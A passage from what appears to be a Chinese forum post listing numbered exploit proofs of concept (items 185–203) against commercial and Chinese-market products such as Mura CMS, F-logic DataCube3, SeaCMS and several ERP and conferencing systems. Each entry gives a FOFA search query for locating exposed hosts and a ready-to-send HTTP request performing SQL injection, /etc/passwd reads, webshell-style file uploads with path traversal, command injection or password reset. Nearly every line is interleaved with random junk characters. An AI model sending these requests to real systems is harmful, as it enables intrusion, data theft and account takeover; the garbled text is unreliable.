: Z5 B- T$ [& B v5 W) U( {
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')2 T6 g. ?! u& |% B$ Z
9 W8 R1 k/ }6 t; N9 E3 H9 W
. |* Z; n. E" G185. 瑞友天翼应用虚拟化系统SQL注入
4 O4 u# C4 r( {9 J3 V; Hversion < 7.0.5.15 U! X1 ]8 D7 e7 `
FOFA:app="REALOR-天翼应用虚拟化系统"
V" d! w( Y$ U; kGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1; _1 A( ~% W% q d, L& f
Host: host
% E3 o8 m0 v+ T- c# |0 x/ {/ g
! v" Z X5 Z0 S8 {$ y
: e Y. X0 v- v- z186. F-logic DataCube3 SQL注入 y4 A$ }4 r. H
CVE-2024-31750/ A H1 H: q/ @% I* c, v! d7 _. P
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
% a. i( q& W+ l! hFOFA:title=="DataCube3"
$ v) u' h+ _, n. |: d( Q. wPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
9 t) V. e; c' F% hHost: your-ip
9 j) X( f% W! ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
) ?7 ~$ p* y: y5 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.81 k/ p" f4 S6 Z- {$ o5 } n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 x% C% R6 {, ], n6 y
Accept-Encoding: gzip, deflate4 V" b& a! s8 o5 H. X2 w
Connection: close
6 h( a2 h5 t/ P; `6 c9 HContent-Type: application/x-www-form-urlencoded
. h: ]: h$ W7 M3 C1 X* d" u
' D0 Z" x2 Y' T6 j: p3 Q3 N; Sreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450/ I9 x D- j1 u
4 y+ e/ q7 p1 M, t& I
- j! h; L! U/ @) \- t* V5 b& i187. Mura CMS processAsyncObject SQL注入
, A' y; c% g- t) D+ RCVE-2024-32640
+ M1 x8 Y, o' |/ YFOFA:"Mura CMS"
$ Z7 Y& ]( m% L' O7 n; |+ ZPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
' `+ R, @& S6 U1 ~9 P% D, r6 RHost: your-ip
0 Z# s' @9 h" c/ @Content-Type: application/x-www-form-urlencoded
5 |6 Q9 H) H$ t, @) w1 O) f, S- J( }
. c' b7 g3 [1 Z( a" h6 k/ G# Z1 Q: |
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
6 ]5 n" T3 M+ O) U: ?( Z+ Q0 d8 h! k0 w k( V
& {, d& Z; B; q' |1 ~
188. 叁体-佳会视频会议 attachment 任意文件读取
# s2 f+ n6 m" T; s4 I9 N5 o3 M3 S9 Eversion <= 3.9.7# A& S' P# a8 v
FOFA:body="/system/get_rtc_user_defined_info?site_id"
. }- m4 _! r& G9 m! R8 AGET /attachment?file=/etc/passwd HTTP/1.1/ }. T. }/ t4 J. i4 X, G
Host: your-ip4 L2 u. R/ I' ?4 ^4 W2 ~2 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36) X* C" G4 @# B3 ~2 Q' [6 o4 B( K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 _$ i$ u! ^! ?3 d. y
Accept-Encoding: gzip, deflate
- Y3 s5 w( v! o: u2 TAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
* L2 Z+ L4 W; h6 nConnection: close
; L9 D9 T& m- M$ U6 C. _5 n) [4 _# z) M C' U
6 P- O: s) o5 ~9 {8 b
189. 蓝网科技临床浏览系统 deleteStudy SQL注入( _+ ~' \/ D! k( M
FOFA:app="LANWON-临床浏览系统"
) K9 S* F5 v* J! X7 ]" G. \% I1 Q) f% k( PGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1; v6 A9 f% Y) l; b# H1 ?
Host: your-ip" B8 i( v. d* _3 N% f; B
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36% x! E2 y* I* @+ g* y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 H H# w; t9 K- t8 @9 fAccept-Encoding: gzip, deflate
3 n' m. T4 F# B! `Accept-Language: zh-CN,zh;q=0.9" Y& w2 |$ O2 U5 d6 A9 j
Connection: close
! U( s+ W+ S) R' s4 ~: i( T* g1 ~. B
; H u' O( t1 U/ t+ ?( k2 _; j/ L/ x6 V9 ^) Y+ {3 b0 M5 h% `5 R; m
190. 短视频矩阵营销系统 poihuoqu 任意文件读取, n% M: c) j# J4 B. _
FOFA:title=="短视频矩阵营销系统"0 ~) G; y$ `, Z
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
7 `, M! W1 d- \- W8 W" eHost: your-ip
" c# E5 X( N3 ]% e' a" T2 l" lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 R; {; Z) j- ~8 l: J% e6 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9! h" ~/ w4 @5 W; t+ v
Content-Type: application/x-www-form-urlencoded
- t' x% S7 T$ rAccept-Encoding: gzip, deflate- {) ^7 e9 C6 @. j# B
Accept-Language: zh-CN,zh;q=0.9
) d5 `8 ]# K# e2 h D& w2 P9 j+ Y. t( J1 N
poi=file:///etc/passwd
+ T6 C2 [+ w m1 g2 @- t; n; k& `, Y2 \
- B( ]( ]5 Z" \
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入/ j1 G( U, N) A8 d& j
FOFA:body="/CDGServer3/index.jsp"0 n% I. c C, j: L- {' q
POST /CDGServer3/js/../NavigationAjax HTTP/1.15 Z1 _8 g% ^9 R8 O6 T
Host: your-ip
4 S# P: w7 o6 L& Q* ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& w4 g0 P! X5 Z# n5 m0 `6 v
Content-Type: application/x-www-form-urlencoded
, }% J5 a9 v$ G/ T% Q+ V1 x( h9 p; x6 l6 t4 A
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=" h4 g# z+ u1 i) I( N" Z" i
: T# }3 ~! q$ m+ e; ?! q G! U
6 G8 F' w4 ]( h @192. 富通天下外贸ERP UploadEmailAttr 任意文件上传, u9 o3 N& Q' Q( U g
FOFA:title="用户登录_富通天下外贸ERP"' T M/ a; u. O; C
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
/ u% H0 Y+ P: EHost: your-ip
+ u8 j' n% p9 f7 T- o+ j# M. wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 r, A1 j8 U) _( O! f6 x D
Content-Type: application/x-www-form-urlencoded( d. q& D# j, ~7 A6 F- c
7 O1 u* j' F0 y0 H* L- ~, \. N' M7 f: }3 r
<% @ webhandler language="C#" class="AverageHandler" %>
- O3 `) c! g( x3 x4 w& l) tusing System; {- j6 H0 j, _: n4 o4 a
using System.Web;
7 Y D! a' s: i1 e: ?public class AverageHandler : IHttpHandler' [8 m3 O* N5 N! @( \
{
8 M5 l% `! S, M4 O' _public bool IsReusable# c( L# {1 y( I7 {9 }4 n& D, J
{ get { return true; } }
9 [" }2 V' d5 f2 j3 ]public void ProcessRequest(HttpContext ctx)
9 F C9 v8 c+ @, B( r4 ~! u{" z+ z N- d- @4 M; G$ ^9 W
ctx.Response.Write("test");
3 V: G2 E0 F, i}3 A7 o$ `6 W8 c8 a
} }7 `2 U5 K8 M: P6 z' `& p
' m8 i! m5 s) m3 g4 z1 i2 F" ^
8 U7 _- I3 t& e) p) C5 V# Y$ b193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
- R6 k% n( B1 u- Z) I5 BFOFA:body="山石云鉴主机安全管理系统"
' W# z) E2 s, ]8 cGET /master/ajaxActions/getTokenAction.php HTTP/1.19 ^( [8 [" U3 a6 ^3 f5 z% h, Z
Host: g7 o/ Q- o/ S" F; \
Cookie: PHPSESSID=2333333333333;
2 l8 J& H4 |: y- y5 MContent-Type: application/x-www-form-urlencoded' I4 |0 A/ }: s+ A3 Z
User-Agent: Mozilla/5.0" _" P" z- D$ ]! c1 a
' [" r7 j* E4 ~
: R' p9 }: ~+ D6 c0 R; u, o% zPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
" p, H$ m: f5 Q: C4 ]* a3 c8 J* ZHost:8 }& `/ l/ q1 B+ [( e, A
User-Agent: Mozilla/5.0) \) T$ A- h: h) g& a! q h5 l9 f
Accept-Encoding: gzip, deflate% Q/ T8 b) k# B* J* j' ^: w$ Y' N6 e
Accept: */*
! Y2 Y& |: N6 s9 c7 x; ?Connection: close
/ H0 L9 f2 m1 {' z$ d+ z1 K& TCookie: PHPSESSID=2333333333333;
) ~, S6 r( q* s4 `Content-Type: application/x-www-form-urlencoded- h1 T% m/ Y9 I
Content-Length: 84
) E; n" ^1 s7 m) b2 V6 ^
x/ R: E/ V7 ^- L4 G' m% nparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')! |4 z) _# g2 l# y
2 Q. |2 y4 P( b& V* x
) I. A4 A2 h: k) D0 K5 d% ?; ~GET /master/img/config HTTP/1.1( `* g- c7 ?2 i0 _/ A
Host:& h' Q' `% W* R- |
User-Agent: Mozilla/5.0( [: c0 z/ P, S6 s1 X
; P0 o/ U1 ?+ [ W' N% V3 j# i6 T: g
9 u Y( f# {8 p7 J194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传3 U8 a9 K6 p( r% \
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
' I9 h, I; P( C$ D2 }5 G
1 [; x5 M* f9 c0 IPOST /servlet/uploadAttachmentServlet HTTP/1.14 F+ P- J4 W! g' T g% w0 d
Host: host
) l5 O! Q) ~2 z; \- |+ R4 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
0 I1 A8 Q# _4 @$ A2 J E- n$ tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) g9 v2 }0 V6 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 V) H: P/ E; T* q) i: AAccept-Encoding: gzip, deflate
4 R, W j0 }1 A6 U# S7 z7 jConnection: close( l; M2 ^) K+ h6 L: Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk* |+ h$ Z" O" X1 o& [0 x4 t& {4 x% t
------WebKitFormBoundaryKNt0t4vBe8cX9rZk: V- b, o: D+ H4 l% Z
2 L4 v7 {, z2 J+ F6 |
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
7 A" ]. j# s% w3 h* n* SContent-Type: text/plain+ ?7 I4 \; t1 X: _" O" s. P8 A' Z
<% out.println("hello");%>
. C$ @. e1 H/ u$ i5 H& l------WebKitFormBoundaryKNt0t4vBe8cX9rZk. h* C" x! x- A" ?' e$ ?
Content-Disposition: form-data; name="json"
" ]& X( Z8 e) { a6 e, { {"iq":{"query":{"UpdateType":"mail"}}}" E9 a. B0 D9 A6 T( _( v. D
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
8 A- O9 ~; O1 r/ J4 P: q- }8 h9 F
8 S# x/ I, s* _8 _
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行0 r8 V% H7 Z, j. }4 A
FOFA:title=="飞鱼星企业级智能上网行为管理系统
' O1 L n& h' e0 y% J [6 H1 I+ @POST /send_order.cgi?parameter=operation HTTP/1.11 ^4 e8 G( D; q' }- O+ `
Host: 127.0.0.1
& f \# U* Z3 e9 C2 {0 UPragma: no-cache
& h2 v% v Y* ~' bCache-Control: no-cache
9 e. S5 U/ J, N4 O1 S% x2 r, iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36# p. w5 x$ w& p# |+ O2 |6 m% S# I
Accept: */*( }& [9 I% F5 f8 c4 N9 S, u
Accept-Encoding: gzip, deflate% h4 U1 j8 a0 G! ^6 `2 v
Accept-Language: zh-CN,zh;q=0.9
* i% [ B6 a% mConnection: close
: Y& X U5 Q' ~& {2 o! |1 E' s# [Content-Type: application/x-www-form-urlencoded. d+ P( q' t( Y0 q! N- |9 g
Content-Length: 68
( H/ A' t" I& s- c a# E# s
& C' d+ }! P. E0 n3 i1 U{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
/ k+ x2 x5 n- ?; _( O; Z6 M4 L: @% N- t8 [5 c9 J
S. q3 R" y& X" }# b& p& p196. 河南省风速科技统一认证平台密码重置
9 p9 I) W N6 H3 R7 Q V1 j, sFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
, j. W6 n/ s& K: A GPOST /cas/userCtl/resetPasswordBySuper HTTP/1.19 u' M+ M: d2 K8 @6 ~6 h/ {, Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.366 e8 @3 f3 }* ]5 z1 u. L% `9 D
Content-Type: application/json;charset=UTF-89 R; z, ]3 y3 f, o4 R3 N
X-Requested-With: XMLHttpRequest: O( Z% ~, V: A* C3 k) Q+ X2 T6 Q6 V
Host:
$ @5 J& W6 U6 _- IAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.27 `, V1 n0 u5 W* i( F3 Y: C
Content-Length: 453 D9 X5 {8 S9 V7 \. P v4 O3 ~# X
Connection: close1 t+ [* Q1 v) E" r6 w
' J8 x' L! H. r
{"xgh":"test","newPass":"test666","email":""}) m3 F: B* ^. @& s) B9 ?
- P! m0 A# I7 W) k6 o7 x9 @9 V6 v6 |7 B
3 f) t9 G9 y4 a197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入; X7 X2 Q" o2 P" J9 j# Y
FOFA:app="浙大恩特客户资源管理系统"* x8 [3 g/ [1 ~; y
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1+ J/ h1 l0 A+ [; M0 C% X( a
Host:
5 Q/ v) }1 l4 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
4 x5 e" |: s& l9 ^, V# t2 eAccept-Encoding: gzip, deflate9 ^6 S% ^! f% u% _/ Q1 ^: E
Connection: close
+ H" U3 W. Y4 j, n; Y" f
; A+ h- I! Z- p6 Q! M {- m. J; {. N' @8 j! B n
6 v0 u2 q3 a% p# A# n198. 阿里云盘 WebDAV 命令注入' r; ^6 k7 s8 i
CVE-2024-29640- f7 }' C+ n* C0 m7 D, H
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1! @7 w5 E" g% \7 h- Z
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64 ~; M2 [1 r5 u `4 F1 x
Accept: */* r8 A# G1 `1 `3 [
Accept-Encoding: gzip, deflate
' p8 D8 f; o8 L2 p9 DAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
/ Z+ O! z9 s; h# K8 f3 c( v2 |8 GConnection: close( _; n& Z5 p/ p: @* o- I, I& {
& p& ]$ H9 O- f' L
( ~7 A7 Q( w D9 T& D# \0 A8 I3 W199. cockpit系统assetsmanager_upload接口 文件上传
: U- L% y2 K, T" c/ q1 F' B+ k. w6 b D
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
- k0 ^0 p7 H" D( V6 J$ DGET /auth/login?to=/ HTTP/1.1' d5 d6 S6 v0 i) [2 Q: c; P: N/ G
4 M0 Q" G* I- ~5 S0 k* i
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"' E/ W) V5 o+ t2 w$ J
/ a2 X& {% m! j( J6 c. F( B4 ?) X2.使用刚才上一步获取到的jwt获取cookie:
/ T% O. V7 n2 p9 m. M! G' }- q
t) r c0 ]9 M: h9 e+ ?7 F7 YPOST /auth/check HTTP/1.1. F: m5 A8 h3 q B
Content-Type: application/json) a& Q% Y7 y7 B
: ]5 N5 u6 o. U. T, p% h{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
4 [% C/ p% Q! u& y; c" r3 Q+ ]0 ]+ x4 k1 [! r
响应:200,返回值:" Y0 X x& s3 O/ {
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/2 m) M) _% o; b7 @. x: |! F
Fofa:title="Authenticate Please!"; l! t1 f! v9 o8 q- _
POST /assetsmanager/upload HTTP/1.1: o, Y* P" |9 i; p/ O
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb36 s s& V; G& l6 l( K; Z* c9 S8 D
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
' Z" |0 \) P- E W9 B1 s8 P4 Q; Z' |: B9 D8 x0 T4 o( l
-----------------------------36D28FBc36bd6feE7Fb3) H; B9 p' q* x; O, |& m
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
! |" K$ d" x" [9 J, `6 Q* \8 ?Content-Type: text/php
( E% ]3 z8 H$ m5 l. M3 v
$ \, t L* F7 h8 c<?php echo "tttt";unlink(__FILE__);?>
" v3 ?5 @8 k: B: y-----------------------------36D28FBc36bd6feE7Fb3: R* O. I; }) k. f1 N
Content-Disposition: form-data; name="folder". j/ ~0 a; E7 v6 s2 W; F0 n. v
$ E# R) @& n$ C
-----------------------------36D28FBc36bd6feE7Fb3--
, n/ n' c% \ P9 R' K
/ v/ l: a* ~) q3 I% e6 Q3 s4 T' Y1 j) }6 n
/storage/uploads/tttt.php
% }; }' R! Z% w) @8 j% T: _& d/ u
Z; ~+ w5 X# a2 Z4 I9 U9 F) `3 E+ A% B200. SeaCMS海洋影视管理系统dmku SQL注入
. d4 p0 ^% C6 S5 zFOFA:app="海洋CMS"% f0 C7 d( f: m8 E/ s0 c5 j
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.19 w% g3 J o2 V; \! F# X% e# b
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
, a( x$ r+ m% ^, o0 {Upgrade-Insecure-Requests: 18 z- x9 m; g/ v! T( o E3 U
Cache-Control: max-age=0. S2 G& t! h& e1 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ a0 W/ |5 b3 ^9 V, L
Accept-Encoding: gzip, deflate
; w; X# s, q9 U# ~0 hAccept-Language: zh-CN,zh;q=0.9& L+ z1 s t: ^) @3 Q, ~; M- C
6 P3 G( x- l5 x
! B% f# x/ { d) ? A201. 方正全媒体新闻采编系统 binary SQL注入
& K0 D G8 a! b3 q+ }FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"" @$ O) p6 j0 x3 g7 Y0 |- `
POST /newsedit/newsplan/task/binary.do HTTP/1.1
! y- S: I) b9 @3 x% Y% v3 A- I0 r7 k. ]Content-Type: application/x-www-form-urlencoded: U% X0 q+ [, e" F8 N, r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ v& T! w2 ^- `8 ?Accept-Encoding: gzip, deflate
- g' b" s( `! `2 R% y$ H3 R& ~Accept-Language: zh-CN,zh;q=0.9
F6 ]: p+ q- _" |( Q5 R3 F. NConnection: close4 d6 u' R( O; d0 }! y4 j+ J4 Z+ O
% p, ~ w" a- ~( m9 PTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
: l- A4 p1 r& |8 j' F
: q; p; I: L2 T* N5 n7 n& Y) \3 G( k/ [4 d9 }
202. 微擎系统 AccountEdit任意文件上传, ~4 f% a5 ^/ {8 i
FOFA:body="/Widgets/WidgetCollection/"
( I; K- Y5 X& K* L a获取__VIEWSTATE和__EVENTVALIDATION值
0 R; v6 Q2 y* k8 S0 wGET /User/AccountEdit.aspx HTTP/1.1
* P3 n* A6 ~2 X2 dHost: 滑板人之家# H B- a. ^( |# j2 \ B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31. f+ q M$ O( J/ j
Content-Length: 0
0 |" |# y! X/ d
) n: C, t3 [5 _: P0 N
: j7 i' p% F* u* A/ z4 X+ I) m- x替换__VIEWSTATE和__EVENTVALIDATION值
* _ s' H# d3 u4 v, cPOST /User/AccountEdit.aspx HTTP/1.1
# Q, q. V% ~, S3 x2 l( @% jAccept-Encoding: gzip, deflate, br* K/ B" D! A/ P
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687/ H$ R& d1 m4 B2 @
+ p l5 u6 I N* E! i2 a8 _" ]3 D3 P-----------------------------786435874t38587593865736587346567358735687
! m% `; C. e; g6 G) S5 D: D+ l* ^Content-Disposition: form-data; name="__VIEWSTATE"
- l) c4 }2 J# b8 h, c1 \8 A
+ C3 D2 c. q7 g8 P__VIEWSTATE( i* a& }0 I; |+ T" E: g
-----------------------------786435874t38587593865736587346567358735687
4 R( b, J! \' \+ g6 Y0 y' g& L: vContent-Disposition: form-data; name="__EVENTVALIDATION"
6 }/ J& `0 c+ T* j) g9 J( P1 u3 F" z7 x8 t u3 E$ f: c
__EVENTVALIDATION6 d9 o. p0 i8 ~1 ^; a% J
-----------------------------786435874t38587593865736587346567358735687) c$ G) G7 G. O' p6 H% V: Z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"- m0 U- @9 {- w0 I& [
Content-Type: text/plain7 }: U9 z5 m$ g# {0 H7 r* V$ e3 @
5 x( S- E y9 s s0 T! M5 ^/ fHello World!5 I& P- ~: C" M" o, }
-----------------------------786435874t38587593865736587346567358735687
; y/ Z# H/ j# O2 h8 M# mContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
* l* L4 p+ a" a7 m( V; M I! o; L2 W! v# Z+ C3 L
上传图片: T- G% L' n3 Q# z
-----------------------------786435874t385875938657365873465673587356873 T3 k7 n8 R6 d
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
2 K+ A2 W/ k. I0 e0 S6 i! J& [
~* ~% d* K9 E* s! I9 a- A5 \5 i" ^, f' h
-----------------------------786435874t38587593865736587346567358735687% o" M% I, J1 ?! {3 v; w
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
* G, L/ e4 b4 i: w/ @' @) |( A$ {5 b7 |3 A' N8 p
) l) s% k0 M' f3 t( w. O* q5 \
-----------------------------786435874t38587593865736587346567358735687--
: I5 i) Q: C5 p4 Y$ P7 k0 |1 y! b$ Y5 y5 y* o, w u! e' ~
+ ~9 T: X! }. {1 N! g2 M V& J
/_data/Uploads/1123.txt
9 q) `0 h6 a6 Z3 `5 V# |% k) _; V
( f) k* G' }( _203. 红海云EHR PtFjk 文件上传
6 P0 w1 O' k! F- n: yFOFA:body="RedseaPlatform"
' {# d* F+ e5 r& ePOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
' t& _/ D% c0 LHost: x.x.x.x+ F3 z" A2 K1 [2 g
Accept-Encoding: gzip9 v1 S3 N$ {3 W; ^4 p3 T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' Q' D- m$ U8 M. @" Y0 g. x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
' h+ m( L3 Q2 X2 K, _ lContent-Length: 210' l2 A* v7 j# W1 u
' D2 H) B" B& p) V
------WebKitFormBoundaryt7WbDl1tXogoZys4) C; l) X# ]! J0 [: U
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
9 H$ Y0 m, ~ S( g' }5 i- VContent-Type:image/jpeg
; d9 L0 y8 D- R5 @6 g+ A
* W* [& W9 J8 J$ h' q0 ?<% out.print("hello,eHR");%>0 D. D0 k/ s8 h1 c' {
------WebKitFormBoundaryt7WbDl1tXogoZys4--% H+ ?4 @; _4 P( f' v4 s
" q" n' _1 U9 o7 J& w0 N
/ H `7 W+ l9 ~+ Z. y, J9 b% n) @
( b8 w; p* N1 w' y, }; b
* @, k# ?- ]- S$ v# {4 K) G
) d3 `; P0 T- N {6 c8 p% L6 N" L5 t5 }5 _& L) c) {
|
发表于 2024-6-5 14:31:29
收藏
分享
支持
反对